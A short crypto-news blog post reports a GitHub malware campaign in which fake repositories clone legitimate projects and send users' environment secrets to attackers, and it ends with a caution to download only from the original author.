A recent report claims there is a widespread malware attack on GitHub which has affected over 35,000 code hits including;
- Crypto
- GoLang
- Python
- Js
- Bash
- Docker
- K8s
This malware is reportedly added to npm scripts, docker images and install docs files. This malware exists in install docs such that a user downloading the installation files for desktop or mobile on GitHub gets to download the infected file.
But recent claims suggests that it’s a creation from attackers which doesn’t affect original file created by the original author but rather creates an option which can confuse users downloading files.
How it Works
This attack will send the ENTIRE ENV of the script, application, and laptop (electron apps), to the attacker’s server when downloaded. These ENVs include:
- Security Keys
- AWS access keys
- Crypto Keys (including private keys and seed phrase).
The attacker creates fake organisations /repositories and pushes clones of Legit projects to github. So when a user gets to github, he ends up downloading the clone and the original file is not accessed and the author gets blame not the hacker.
The attacker runs an arbitrary code on your server once the file is downloaded and he uploads your env.
Caution: Users are advised to always use the correct link from the originating author on GitHub before downloading any file.
Discover more from DiutoCoinNews
Subscribe to get the latest posts sent to your email.